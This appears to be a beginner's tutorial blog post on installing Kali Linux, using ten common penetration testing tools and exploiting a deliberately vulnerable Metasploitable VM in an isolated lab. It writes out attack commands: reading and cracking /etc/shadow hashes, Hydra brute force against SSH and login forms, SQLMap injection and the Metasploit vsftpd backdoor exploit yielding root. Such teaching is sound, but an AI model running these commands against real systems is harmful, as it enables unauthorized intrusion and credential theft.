Kali Linux for Beginners: Setup, Tools, and First Hack

TL;DR

Kali Linux is the industry standard penetration testing distribution, preloaded with over 600 security tools used by ethical hackers and security professionals worldwide. This tutorial walks beginners through installing Kali on VirtualBox, navigating the desktop environment, understanding the top 10 essential tools, and completing a first practical exercise scanning a Metasploitable virtual machine. No prior Linux experience is required, just curiosity and a willingness to learn by doing.

It was the night before her university's first Capture the Flag competition, and Priya had a problem. She had studied networking theory for months, memorized the OSI model, and could recite firewall rules from memory. But she had never actually scanned a network, never intercepted a packet, never exploited a vulnerable service. Her teammate handed her a USB drive and said, "Boot into this. It has everything you need."

That USB drive contained Kali Linux. Within two hours, Priya had discovered open ports on the practice server, identified a misconfigured web application, and used a SQL injection to capture her first flag. She placed third in the competition the next day. Not because she suddenly became an expert overnight, but because Kali gave her the tools to turn theory into practice.

That transformation, from knowing about security to actually doing security, is what Kali Linux enables. And it starts with getting it installed.

What Is Kali Linux and Why It Matters

Kali Linux is a Debian based Linux distribution designed specifically for penetration testing, security research, and digital forensics. Maintained by OffSec (the organization behind the OSCP certification), Kali ships with over 600 preinstalled security tools organized into categories: information gathering, vulnerability analysis, web application testing, password attacks, wireless attacks, exploitation, and forensics.

What makes Kali different from installing individual tools on Ubuntu or Fedora is integration. Every tool is preconfigured, dependencies are resolved, and the entire system is built around the workflow of a security professional. The kernel includes patches for wireless injection. The repositories contain tool versions tested for compatibility. The default user environment is configured for penetration testing, not desktop productivity.

Over 80% of professional penetration testers use Kali as their primary testing distribution. When job postings mention "proficiency with industry standard security tools," they are almost always referring to tools that ship with Kali. When certification exams like the OSCP hand you a testing environment, it runs Kali.

This is not a toy. It is a professional toolkit. And it is completely free.

Installing Kali Linux on VirtualBox

Running Kali inside a virtual machine is the safest and most practical approach for beginners. You keep your main operating system intact, you can take snapshots before risky experiments, and you can delete the entire environment and start fresh if something goes wrong.

Step 1: Download and Install VirtualBox

Download VirtualBox from virtualbox.org. Choose the package for your host operating system (Windows, macOS, or Linux) and follow the installer. Accept the default settings. The installation takes about five minutes.

Step 2: Download the Kali Linux Image

Visit kali.org/get-kali and download the prebuilt VirtualBox image. This is a .ova file that contains a fully configured Kali installation. The download is approximately 3.5 GB.

Using the prebuilt image instead of the ISO installer saves significant time. The OVA comes with VirtualBox Guest Additions already installed, which means shared clipboard, drag and drop file transfer, and automatic screen resizing work immediately.

Step 3: Import the Image

Open VirtualBox, click File > Import Appliance, select the downloaded .ova file, and click Import. Before starting the machine, adjust these settings:

System > Motherboard > Base Memory: 4096 MB (minimum 2048)
System > Processor > CPU: 2 cores
Display > Screen > Video Memory: 128 MB
Network > Adapter 1 > Attached to: NAT

The NAT network setting gives your Kali VM internet access through your host machine while keeping it isolated from your local network. This is important for safe experimentation.

Step 4: First Boot

Start the virtual machine. Kali boots to a login screen. The default credentials for the prebuilt image are:

Username: kali
Password: kali

After logging in, open a terminal (the black rectangle icon in the taskbar) and update the system:

sudo apt update && sudo apt upgrade -y

This ensures all tools are at their latest versions. The update can take 10 to 20 minutes depending on your internet connection.

Navigating the Kali Desktop

Kali uses the Xfce desktop environment by default. It is lightweight and fast, which matters when you are running inside a VM. The key elements are:

The top panel contains the Applications menu (organized by security category), workspace switcher, and system tray. The bottom panel shows your open windows. The desktop is intentionally minimal because most work happens in the terminal.

Open the Applications menu and explore the categories. 01 Information Gathering contains reconnaissance tools. 05 Password Attacks holds cracking utilities. 09 Sniffing & Spoofing includes network interception tools. This organization matches the phases of a penetration test, from reconnaissance through exploitation to reporting.

The file manager, web browser (Firefox ESR), and text editor (Mousepad) are under the Usual Applications category. You will use Firefox frequently for web application testing alongside Burp Suite.

The Top 10 Kali Linux Tools Every Beginner Should Know

Kali ships with hundreds of tools, but mastering these ten covers the fundamentals of ethical hacking. Each one maps to a specific phase of a penetration test.

1. Nmap (Network Mapper)

Nmap is the single most important reconnaissance tool in cybersecurity. It discovers hosts on a network, identifies open ports, detects running services and their versions, and even fingerprints operating systems.

# Basic scan of a target
nmap 192.168.1.100

# Service version detection
nmap -sV 192.168.1.100

# Operating system detection (requires root)
sudo nmap -O 192.168.1.100

# Aggressive scan: OS detection, version, scripts, traceroute
sudo nmap -A 192.168.1.100

Nmap can scan all 65,535 TCP ports on a local network target in under 60 seconds using SYN scan mode (-sS). It is the first tool you run on every engagement because you cannot attack what you cannot see.

2. Burp Suite (Web Application Testing)

Burp Suite is an intercepting proxy that sits between your browser and a web application. It captures every HTTP request and response, letting you inspect, modify, and replay traffic. The Community Edition is preinstalled on Kali.

Launch it from Applications > 03 Web Application Analysis > Burp Suite. Configure Firefox to route traffic through Burp's proxy (127.0.0.1:8080), and every web request becomes visible and editable. This is how you find SQL injection, cross site scripting, and authentication bypasses in web applications.

3. Metasploit Framework

Metasploit is the world's most widely used exploitation framework. It contains a database of known exploits for operating systems, services, and applications. You select a target vulnerability, configure the exploit, choose a payload (the code that runs after exploitation), and execute.

# Launch the Metasploit console
msfconsole

# Search for exploits targeting a specific service
search vsftpd

# Use an exploit
use exploit/unix/ftp/vsftpd_234_backdoor

# Set the target
set RHOSTS 192.168.1.100

# Execute
exploit

Metasploit transforms theoretical vulnerabilities into demonstrated impact. When a client asks "how bad is this vulnerability really?" Metasploit provides the answer.

4. John the Ripper (Password Cracking)

John the Ripper cracks password hashes using dictionary attacks, brute force, and hybrid methods. When you extract password hashes from a compromised system, John determines the original passwords.

# Crack Linux shadow file hashes
sudo unshadow /etc/passwd /etc/shadow > hashes.txt
john hashes.txt

# Use a specific wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Show cracked passwords
john --show hashes.txt

The rockyou.txt wordlist ships with Kali and contains over 14 million real passwords from a 2009 data breach. It cracks a surprising percentage of passwords in most engagements, which is exactly why strong password policies matter.

5. Aircrack-ng (Wireless Auditing)

Aircrack-ng is a suite of tools for testing wireless network security. It captures wireless traffic, deauthenticates clients to force handshake capture, and cracks WPA/WPA2 keys through dictionary attacks. Wireless testing requires a compatible wireless adapter that supports monitor mode and packet injection.

6. SQLMap (SQL Injection Automation)

SQLMap automates the detection and exploitation of SQL injection flaws. Point it at a URL with parameters, and it tests for injection, identifies the database type, and can extract tables, columns, and data.

# Test a URL parameter for SQL injection
sqlmap -u "http://target.com/page?id=1" --dbs

# Enumerate tables in a specific database
sqlmap -u "http://target.com/page?id=1" -D database_name --tables

7. Hydra (Online Password Attacks)

Hydra performs online brute force attacks against network services: SSH, FTP, HTTP, SMB, RDP, and dozens more. Unlike John the Ripper which cracks offline hashes, Hydra tries actual login attempts against live services.

# Brute force SSH login
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

# Brute force web login form
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login:user=^USER^&pass=^PASS^:Invalid credentials"

8. Wireshark (Packet Analysis)

Wireshark captures and analyzes network traffic at the packet level. It shows you exactly what data traverses the network: DNS queries, HTTP requests, authentication attempts, and file transfers. In Kali, it integrates with other tools to provide visibility into what your attacks look like on the wire.

9. Nikto (Web Server Scanner)

Nikto scans web servers for known vulnerabilities, misconfigurations, and outdated software. It checks for dangerous files, default installations, and insecure server headers.

# Scan a web server
nikto -h http://192.168.1.100

Nikto is loud. It generates hundreds of requests and is easily detected by intrusion detection systems. That makes it unsuitable for stealth engagements but excellent for comprehensive vulnerability discovery in authorized tests.

10. Gobuster (Directory Brute Forcing)

Gobuster discovers hidden directories and files on web servers by brute forcing paths using a wordlist. Web applications often contain admin panels, backup files, configuration endpoints, and development artifacts that are not linked from the public interface but are still accessible.

# Enumerate directories
gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt

# Enumerate with file extensions
gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

Your First Practical Exercise: Scanning Metasploitable

Theory only goes so far. The fastest way to learn Kali is to use it against a system designed to be hacked. Metasploitable 2 is a deliberately vulnerable Linux virtual machine created by Rapid7. It contains over 30 misconfigured services, weak passwords, and exploitable applications, all in a safe, isolated environment.

Setting Up Metasploitable

Download Metasploitable 2 from VulnHub or SourceForge. It comes as a .vmdk file. Create a new VM in VirtualBox:

1. Click New, name it "Metasploitable", select Linux / Ubuntu (64-bit)
2. Assign 512 MB RAM (it needs very little)
3. Select Use an existing virtual hard disk file and choose the downloaded .vmdk
4. Before starting, change the network adapter to Host-only Adapter

Change your Kali VM's network adapter to the same Host-only Adapter. This creates an isolated network where both machines can communicate without exposing Metasploitable to the internet. Never connect Metasploitable to a real network. Its vulnerabilities are intentional and severe.

Boot Metasploitable (login: msfadmin / msfadmin) and note its IP address:

ifconfig

Running Your First Scan

Back in your Kali terminal, start with host discovery to confirm you can reach the target:

ping -c 4 <metasploitable-ip>

Now run a comprehensive Nmap scan:

sudo nmap -sV -sC -O <metasploitable-ip>

The flags mean: -sV detects service versions, -sC runs default NSE scripts for additional enumeration, and -O attempts operating system fingerprinting. The output will reveal dozens of open ports and running services:

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1
23/tcp   open  telnet      Linux telnetd
80/tcp   open  http        Apache httpd 2.2.8
445/tcp  open  netbios-ssn Samba smbd 3.X
3306/tcp open  mysql       MySQL 5.0.51a
...

Each open port represents an attack surface. The vsftpd 2.3.4 version is particularly notable because it contains a famous backdoor vulnerability. The outdated versions of SSH, Apache, and MySQL all have known exploits.

Exploring the Vulnerable Web Application

Open Firefox in Kali and navigate to http://<metasploitable-ip>. You will see a page listing several intentionally vulnerable web applications, including DVWA (Damn Vulnerable Web Application), Mutillidae, and TWiki.

Run Nikto against the web server:

nikto -h http://<metasploitable-ip>

Then use Gobuster to find hidden directories:

gobuster dir -u http://<metasploitable-ip> -w /usr/share/wordlists/dirb/common.txt

Compare what Gobuster finds with what is linked on the main page. You will likely discover directories and files that were not publicly listed. This is the core value of directory brute forcing: finding what developers intended to hide but failed to protect.

Attempting Your First Exploit

With the Nmap results showing vsftpd 2.3.4 on port 21, launch Metasploit:

msfconsole

Search for a known exploit:

search vsftpd

Metasploit will return the exploit/unix/ftp/vsftpd_234_backdoor module. This exploit targets a backdoor that was inserted into the vsftpd 2.3.4 source code in 2011. Configure and run it:

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <metasploitable-ip>
exploit

If the exploit succeeds, you will have a command shell on the target system. Type whoami and you will see root. You just achieved full system compromise on your first target. Take a moment to appreciate what happened: you identified a service, found a known vulnerability, selected an exploit, and gained unauthorized access. This is what penetration testers do professionally, except they do it with authorization and then help organizations fix the weaknesses they discover.

Building Your Practice Lab

Metasploitable is just the beginning. Once you are comfortable with basic scanning and exploitation, expand your lab with additional vulnerable machines from VulnHub. Start with machines rated "Easy" and work your way up. Each machine teaches different skills: web application exploitation, privilege escalation, password cracking, or network pivoting.

Your practice lab should always be isolated on a host-only network. Never connect intentionally vulnerable machines to your home network or the internet. The vulnerabilities are real, and an exposed Metasploitable machine will be compromised by automated scanners within minutes.

From Lab to Career

Kali Linux is a means, not an end. The tools teach you offensive security thinking: how attackers find weaknesses, chain exploits, and move through networks. That knowledge is valuable whether you end up on the offensive side (penetration testing, red teaming) or the defensive side (SOC analysis, incident response, network security).

The path from your first Nmap scan to a career in cybersecurity follows a pattern. Master the basics in your home lab. Document your learning through write ups and blog posts. Pursue structured training that fills knowledge gaps. Earn certifications that validate your skills. The OSCP from OffSec, which tests candidates in a 24 hour practical exam using Kali Linux tools, is widely regarded as the gold standard for penetration testers.

Every professional pentester remembers the moment their first exploit succeeded. The moment the terminal returned root@metasploitable. That mix of excitement and "wait, it was that easy?" is exactly the feeling that drives people to dedicate their careers to finding and fixing these weaknesses before malicious actors do.

Your Kali VM is waiting. Open it. Scan something. Break something. Then figure out how to defend against what you just did. That is how cybersecurity professionals are made.